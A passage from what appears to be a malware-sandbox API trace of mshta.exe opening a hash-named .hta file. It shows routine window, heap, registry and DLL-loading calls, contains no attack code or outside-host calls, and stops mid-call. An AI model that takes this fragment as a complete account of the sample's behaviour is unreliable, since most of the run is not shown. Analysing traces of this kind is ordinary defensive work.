Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x7feefeeb760*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x7fef0004320 | out: ppv=0x7fef0004320*=0x450890) returned 0x0 [0053.424] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x450890, aaClassList=0x30f000*=0xc178, uSize=0x1) returned 0x0 [0053.424] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc178, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=587, hWndParent=0x40106, hMenu=0x0, hInstance=0x7feef840000, lpParam=0x435570) returned 0x20316 [0053.425] GetWindowLongW (hWnd=0x20316, nIndex=-20) returned 0 [0053.425] SetWindowLongPtrW (hWnd=0x20316, nIndex=-21, dwNewLong=0x435570) returned 0x0 [0053.425] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x81, wParam=0x0, lParam=0x30e9f0*=4412784, plResult=0x30e7b0 | out: plResult=0x30e7b0) returned 0x1 [0053.425] NtdllDefWindowProc_W () returned 0x1 [0053.425] GetCurrentThreadId () returned 0xf14 [0053.425] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0053.425] GetCurrentThreadId () returned 0xf14 [0053.425] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0053.425] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x1, wParam=0x0, lParam=0x30e9f0*=4412784, plResult=0x30e7b0 | out: plResult=0x30e7b0) returned 0x1 [0053.425] NtdllDefWindowProc_W () returned 0x0 [0053.425] GetCurrentThreadId () returned 0xf14 [0053.425] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0053.426] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x5, wParam=0x0, lParam=0x24b0428, plResult=0x30e830 | out: plResult=0x30e830) returned 0x1 [0053.426] NtdllDefWindowProc_W () returned 0x0 [0053.426] GetCurrentThreadId () returned 0xf14 [0053.426] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0053.426] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x30e830 | out: plResult=0x30e830) returned 0x1 [0053.426] NtdllDefWindowProc_W () returned 0x0 [0053.426] GetCurrentThreadId () returned 0xf14 [0053.426] GetClassNameW (in: hWnd=0x40106, lpClassName=0x30f010, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0053.426] StrCmpIW (psz1="HTML Application Host Window Class", psz2="HTMLPageDesignerWndClass") returned -1 [0053.426] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x450890, fRestoreLayout=1) returned 0x0 [0053.426] SendMessageW (hWnd=0x20316, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0053.426] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0053.426] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x30ede0 | out: plResult=0x30ede0) returned 0x1 [0053.426] NtdllDefWindowProc_W () returned 0x3 [0053.427] GetCurrentThreadId () returned 0xf14 [0053.427] IntersectRect (in: lprcDst=0x30f2a0, lprcSrc1=0x459d88, lprcSrc2=0x459d98 | out: lprcDst=0x30f2a0) returned 1 [0053.427] EqualRect (lprc1=0x30f2a0, lprc2=0x459d88) returned 1 [0053.427] InvalidateRect (hWnd=0x20316, lpRect=0x0, bErase=1) returned 1 [0053.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x158) returned 0x45c260 [0053.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x178) returned 0x45c3c0 [0053.427] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x150) returned 0x45c540 [0053.428] IntersectRect (in: lprcDst=0x30f130, lprcSrc1=0x30f130, lprcSrc2=0x30f0a0 | out: lprcDst=0x30f130) returned 1 [0053.428] IntersectRect (in: lprcDst=0x30f130, lprcSrc1=0x30f130, lprcSrc2=0x30f0a0 | out: lprcDst=0x30f130) returned 1 [0053.429] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x445ba0 [0053.430] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x4508d0 [0053.430] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xf8) returned 0x437d50 [0053.430] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.430] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.430] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x50) returned 0x44c430 [0053.430] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x45c6d0 [0053.430] GetCurrentThreadId () returned 0xf14 [0053.430] GetCurrentThreadId () returned 0xf14 [0053.430] GetCurrentThreadId () returned 0xf14 [0053.432] IntersectRect (in: lprcDst=0x30eeb0, lprcSrc1=0x30eeb0, lprcSrc2=0x30ee80 | out: lprcDst=0x30eeb0) returned 1 [0053.432] IntersectRect (in: lprcDst=0x45c5a0, lprcSrc1=0x45c5a0, lprcSrc2=0x30eea0 | out: lprcDst=0x45c5a0) returned 1 [0053.432] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0053.502] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x44c490 [0053.503] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c490 | out: hHeap=0x3f0000) returned 1 [0053.503] SetWindowPos (hWnd=0x20316, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x5f) returned 1 [0053.504] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0053.504] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x46, wParam=0x0, lParam=0x30f2a0*=131862, plResult=0x30f090 | out: plResult=0x30f090) returned 0x1 [0053.504] NtdllDefWindowProc_W () returned 0x0 [0053.504] GetCurrentThreadId () returned 0xf14 [0053.505] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0053.505] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x47, wParam=0x0, lParam=0x30f2a0*=131862, plResult=0x30f090 | out: plResult=0x30f090) returned 0x1 [0053.505] NtdllDefWindowProc_W () returned 0x0 [0053.505] GetCurrentThreadId () returned 0xf14 [0053.506] SetTimer (hWnd=0x20316, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0053.576] GetFocus () returned 0x0 [0053.576] EnumChildWindows (hWndParent=0x20316, lpEnumFunc=0x7feef99e450, lParam=0x30f010) returned 0 [0053.576] GetFocus () returned 0x0 [0053.576] SetFocus (hWnd=0x20316) returned 0x0 [0053.597] NtdllDefWindowProc_W () returned 0x0 [0053.896] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0053.897] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x7fef32b0000 [0054.346] GetProcAddress (hModule=0x7fef32b0000, lpProcName="LresultFromObject") returned 0x7fef32b3aa8 [0054.346] LresultFromObject () returned 0xc164 [0054.411] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x4cfeb0 [0054.412] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x45b880 [0054.668] GetCurrentThreadId () returned 0xf14 [0054.671] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cfeb0 | out: hHeap=0x3f0000) returned 1 [0054.671] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xc0) returned 0x4ce6b0 [0054.671] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4cfeb0 [0054.671] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4461d0 [0054.672] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4ce6b0 | out: hHeap=0x3f0000) returned 1 [0054.673] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xc0) returned 0x4ce6b0 [0054.676] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4cffa0 [0054.676] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x446260 [0054.676] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4ce6b0 | out: hHeap=0x3f0000) returned 1 [0054.677] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x45b9c0 [0054.678] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x68) returned 0x4dbb90 [0054.678] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0054.678] GetMessageTime () returned 0 [0054.678] GetMessagePos () returned 0x0 [0054.678] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x30e580 | out: plResult=0x30e580) returned 0x0 [0054.680] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0054.680] GetMessageTime () returned 0 [0054.681] GetMessagePos () returned 0x0 [0054.681] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x282, wParam=0x2, lParam=0x0, plResult=0x30dbe0 | out: plResult=0x30dbe0) returned 0x0 [0054.681] GetCurrentThreadId () returned 0xf14 [0054.681] GetCurrentThreadId () returned 0xf14 [0054.681] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0054.681] GetMessageTime () returned 0 [0054.681] GetMessagePos () returned 0x0 [0054.681] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30e960 | out: lpPoint=0x30e960) returned 1 [0054.681] ScreenToClient (in: hWnd=0x20316, lpPoint=0x30e960 | out: lpPoint=0x30e960) returned 1 [0054.682] GetCapture () returned 0x0 [0054.682] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c7f0 [0054.682] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x45ba10 [0054.683] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x4cd9c0 [0054.684] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd9c0 | out: hHeap=0x3f0000) returned 1 [0054.684] GetCurrentThreadId () returned 0xf14 [0054.684] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x44c7f0 | out: hHeap=0x3f0000) returned 1 [0054.684] GetCurrentThreadId () returned 0xf14 [0054.684] GetCurrentThreadId () returned 0xf14 [0054.684] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x41b450, Size=0x90) returned 0x4d0ae0 [0054.684] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x7, wParam=0x0, lParam=0x0, plResult=0x30ed00 | out: plResult=0x30ed00) returned 0x1 [0054.684] NtdllDefWindowProc_W () returned 0x0 [0054.685] GetCurrentThreadId () returned 0xf14 [0054.685] CActiveIMMAppEx_Trident:IActiveIMMApp:getContext (in: This=0x450890, hWnd=0x20316, phIMC=0x30f1c8 | out: phIMC=0x30f1c8*=0x302b9) returned 0x0 [0054.685] CActiveIMMAppEx_Trident:IActiveIMMApp:AssociateContext (in: This=0x450890, hWnd=0x20316, hIME=0x0, phPrev=0x30f1d0 | out: phPrev=0x30f1d0*=0x302b9) returned 0x0 [0054.685] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xc0) returned 0x4ce6b0 [0054.685] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4ce6b0 | out: hHeap=0x3f0000) returned 1 [0054.686] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xc0) returned 0x4ce6b0 [0054.686] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4ce6b0 | out: hHeap=0x3f0000) returned 1 [0054.686] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45ba10 | out: hHeap=0x3f0000) returned 1 [0054.686] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45b9c0 | out: hHeap=0x3f0000) returned 1 [0054.687] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0054.687] GetMessageTime () returned 0 [0054.687] GetMessagePos () returned 0x0 [0054.687] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x30ecf0 | out: plResult=0x30ecf0) returned 0x0 [0054.687] GetCurrentThreadId () returned 0xf14 [0054.687] GetWindowLongPtrW (hWnd=0x20316, nIndex=-21) returned 0x435570 [0054.687] GetMessageTime () returned 0 [0054.687] GetMessagePos () returned 0x0 [0054.687] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x450890, hWnd=0x20316, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x30ecf0 | out: plResult=0x30ecf0) returned 0x0 [0054.687] GetCurrentThreadId () returned 0xf14 [0054.688] IsOS (dwOS=0x25) returned 1 [0054.688] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30efd8 | out: phkResult=0x30efd8*=0x1c4) returned 0x0 [0054.688] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x30efe0 | out: phkResult=0x30efe0*=0x1c8) returned 0x0 [0054.688] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x30ef68 | out: phkResult=0x30ef68*=0x0) returned 0x2 [0054.688] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x30ef68 | out: phkResult=0x30ef68*=0x1cc) returned 0x0 [0054.688] SHRegGetValueW () returned 0x0 [0054.688] RegCloseKey (hKey=0x1cc) returned 0x0 [0054.688] RegCloseKey (hKey=0x0) returned 0x6 [0054.688] RegCloseKey (hKey=0x0) returned 0x6 [0054.688] RegCloseKey (hKey=0x1c4) returned 0x0 [0054.688] RegCloseKey (hKey=0x1c8) returned 0x0 [0054.688] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x7fef3310000 [0056.289] GetVersionExW (in: lpVersionInformation=0x30ea90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x30ea90*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0056.289] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x7fef3310000 [0056.289] LoadStringW (in: hInstance=0x7fef3310000, uID=0xb5, lpBuffer=0x30f110, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0056.314] LoadStringW (in: hInstance=0x7fef3310000, uID=0xb5, lpBuffer=0x30f1c0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0056.314] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x48) returned 0x45b9c0 [0056.314] LoadStringW (in: hInstance=0x7fef3310000, uID=0xb5, lpBuffer=0x30f190, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd [0056.315] ShowWindow (hWnd=0x20316, nCmdShow=1) returned 1 [0056.315] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4218c0 | out: hHeap=0x3f0000) returned 1 [0056.315] GetMessageW (in: lpMsg=0x30f620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x30f620) returned 1 [0056.316] TranslateMessage (lpMsg=0x30f620) returned 0 [0056.316] DispatchMessageW (lpMsg=0x30f620) returned 0x0 [0056.317] CreateUri (in: pwzURI="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x30dc30 | out: ppURI=0x30dc30*=0x44ef70) returned 0x0 [0056.317] IUnknown:QueryInterface (in: This=0x44ef70, riid=0x7feeff2ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x30dc00 | out: ppvObject=0x30dc00*=0x44ef70) returned 0x0 [0056.317] IUnknown:Release (This=0x44ef70) returned 0x4 [0056.317] IUnknown:AddRef (This=0x44ef70) returned 0x5 [0056.317] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xce) returned 0x4e1400 [0056.318] IUnknown:Release (This=0x44ef70) returned 0x4 [0056.318] IUnknown:Release (This=0x44ef70) returned 0x3 [0056.318] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x100) returned 0x4e37d0 [0056.318] FindResourceW (hModule=0x7fef3310000, lpName=0x1fe, lpType=0x6) returned 0x2c26c18 [0056.318] LoadResource (hModule=0x7fef3310000, hResInfo=0x2c26c18) returned 0x2c4cc84 [0056.318] LockResource (hResData=0x2c4cc84) returned 0x2c4cc84 [0056.318] VirtualQuery (in: lpAddress=0x2c4cc84, lpBuffer=0x30ed60, dwLength=0x30 | out: lpBuffer=0x30ed60*(BaseAddress=0x2c4c000, AllocationBase=0x2c20000, AllocationProtect=0x8, __alignment1=0x0, RegionSize=0x104000, State=0x1000, Protect=0x8, Type=0x40000, __alignment2=0x0)) returned 0x30 [0056.318] SizeofResource (hModule=0x7fef3310000, hResInfo=0x2c26c18) returned 0xe6 [0056.319] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4e1400 | out: hHeap=0x3f0000) returned 1 [0056.319] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4e37d0, Size=0xec) returned 0x4e37d0 [0056.319] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xf0) returned 0x438950 [0056.319] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x18) returned 0x4cda40 [0056.319] RegisterDragDrop (hwnd=0x20316, pDropTarget=0x7fef0002728) returned 0x0 [0056.323] ParseURLW (in: pcszURL="file:///C:/Users/KEECFM~1/Desktop/4d4d70e1918494a0a39641bd8dbfc23ae6451f3d20396b43f150623b8cfe4e93.hta", ppu=0x30eea0 | out: ppu=0x30eea0) returned 0x0 [0056.323] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0056.323] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0056.323] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x3f0000) returned 1 [0056.324] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x48) returned 0x45ba10 [0056.324] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x4462f0 [0056.324] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4218c0 [0056.324] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x48) returned 0x45ba60 [0056.324] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x446380 [0056.324] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0) returned 0x4d60c0 [0056.325] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x58) returned 0x44c8b0 [0056.325] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x446410 [0056.326] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xc0) returned 0x4ce6b0 [0056.327] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4e0740 [0056.327] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x12) returned 0x4cda60 [0056.327] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4464a0 [0056.327] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x446530 [0056.328] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x80) returned 0x4465c0 [0056.328] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x800) returned 0x4e38e0 [0056.328] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4e38e0, Size=0x27c8) returned 0x4e40f0 [0056.329] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45cea0 | out: hHeap=0x3f0000) returned 1 [0056.329] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4e40f0, Size=0x47c8) returned 0x4e68c0 [0056.330] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45efe0 | out: hHeap=0x3f0000) returned 1 [0056.330] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4e68c0, Size=0x6bac) returned 0x4e68c0 [0056.331] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x461000 | out: hHeap=0x3f0000) returned 1 [0056.331] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x4e68c0, Size=0xa182) returned 0x1e30fd0 [0056.332] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x463020 | out: hHeap=0x3f0000) returned 1 [0056.333] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45eec0 | out: hHeap=0x3f0000) returned 1 [0056.333] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x465040 | out: hHeap=0x3f0000) returned 1 [0056.335] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x1e30fd0, Size=0xf242) returned 0x1e3b160 [0056.336] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x467060 | out: hHeap=0x3f0000) returned 1 [0056.337] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4692a0 | out: hHeap=0x3f0000) returned 1 [0056.337] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x1e3b160, Size=0x16b62) returned 0x1e4a3b0 [0056.339] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x46b2c0 | out: hHeap=0x3f0000) returned 1 [0056.339] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x46d2e0 | out: hHeap=0x3f0000) returned 1 [0056.340] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x46f300 | out: hHeap=0x3f0000) returned 1 [0056.340] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x471320 | out: hHeap=0x3f0000) returned 1 [0056.340] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x1e4a3b0, Size=0x22112) returned 0x1e60f20 [0056.343] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x473340 | out: hHeap=0x3f0000) returned 1 [0056.346] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x475360 | out: hHeap=0x3f0000) returned 1 [0056.347] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x477380 | out: hHeap=0x3f0000) returned 1 [0056.347] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4793a0 | out: hHeap=0x3f0000) returned 1 [0056.348] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x47b3c0 | out: hHeap=0x3f0000) returned 1 [0056.349] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x47d3e0 | out: hHeap=0x3f0000) returned 1 [0056.349] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x1e60f20, Size=0x3319a) returned 0x1e83040 [0056.352] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x47f430 | out: hHeap=0x3f0000) returned 1 [0056.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x481640 | out: hHeap=0x3f0000) returned 1 [0056.353] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x483850 | out: hHeap=0x3f0000) returned 1 [0056.354] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x469080 | out: hHeap=0x3f0000) returned 1 [0056.356] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x485a60 | out: hHeap=0x3f0000) returned 1 [0056.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x487c70 | out: hHeap=0x3f0000) returned 1 [0056.357] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x489e80 | out: hHeap=0x3f0000) returned 1 [0056.358] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x48c090 | out: hHeap=0x3f0000) returned 1 [0056.359] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x48e2a0 | out: hHeap=0x3f0000) returned 1 [0056.359] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x1e83040, Size=0x4ca66) returned 0x1e30fd0 [0056.362] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4904b0 | out: hHeap=0x3f0000) returned 1 [0056.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4926c0 | out: hHeap=0x3f0000) returned 1 [0056.363] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4948d0 | out: hHeap=0x3f0000) returned 1 [0056.364] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x496ae0 | out: hHeap=0x3f0000) returned 1 [0056.364] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x498cf0 | out: hHeap=0x3f0000) returned 1 [0056.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x49af00 | out: hHeap=0x3f0000) returned 1 [0056.365] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x49d110 | out: hHeap=0x3f0000) returned 1 [0056.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x49f320 | out: hHeap=0x3f0000) returned 1 [0056.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4a1530 | out: hHeap=0x3f0000) returned 1 [0056.366] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4a3740 | out: hHeap=0x3f0000) returned 1 [0056.367] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4a5950 | out: hHeap=0x3f0000) returned 1 [0056.367] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4a7b60 | out: hHeap=0x3f0000) returned 1 [0056.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4a9d70 | out: hHeap=0x3f0000) returned 1 [0056.368] RtlReAllocateHeap (Heap=0x3f0000, Flags=0x0, Ptr=0x1e30fd0, Size=0x72f98) returned 0x1e30fd0 [0056.368] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4abf80 | out: hHeap=0x3f0000) returned 1 [0056.369] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4ae190 | out: hHeap=0x3f0000) returned 1 [0056.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4b03a0 | out: hHeap=0x3f0000) returned 1 [0056.370] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4b25b0 | out: hHeap=0x3f0000) returned 1 [0056.370] HeapFree (in: hHeap=0x3f0000, 